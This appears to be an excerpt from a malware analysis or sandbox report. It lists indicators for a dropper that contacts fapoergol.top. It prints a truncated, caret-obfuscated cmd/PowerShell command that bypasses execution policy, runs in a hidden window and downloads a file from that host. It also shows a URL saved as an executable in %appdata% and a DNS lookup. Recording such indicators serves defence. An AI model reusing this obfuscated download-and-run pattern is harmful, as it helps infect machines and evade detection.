Technical Information
- http://www.fapoergol.top/read.php?f=1.gif as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOWE^RsH^ELl.ex^e^ -EXEc^U^T^i^oN^p^oli^Cy B^YPAs^s ^-no^prO^fIle^ ^-w^i^NDOWsTYl^e^ h^Id^dEn (neW^-OBj^e^Ct^ SY^stem^.nE^t.WEB^cL^IENT^)^.d^ow^nlO^AdFI^L^e^('http://www.fapoergol....
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /c "pOWE^RsH^ELl.ex^e^ -EXEc^U^T^i^oN^p^oli^Cy B^YPAs^s ^-no^prO^fIle^ ^-w^i^NDOWsTYl^e^ h^Id^dEn (neW^-OBj^e^Ct^ SY^stem^.nE^t.WEB^cL^IENT^)^.d^ow^nlO^AdFI^L^e^('http://www.fapoergol....' (with hidden window)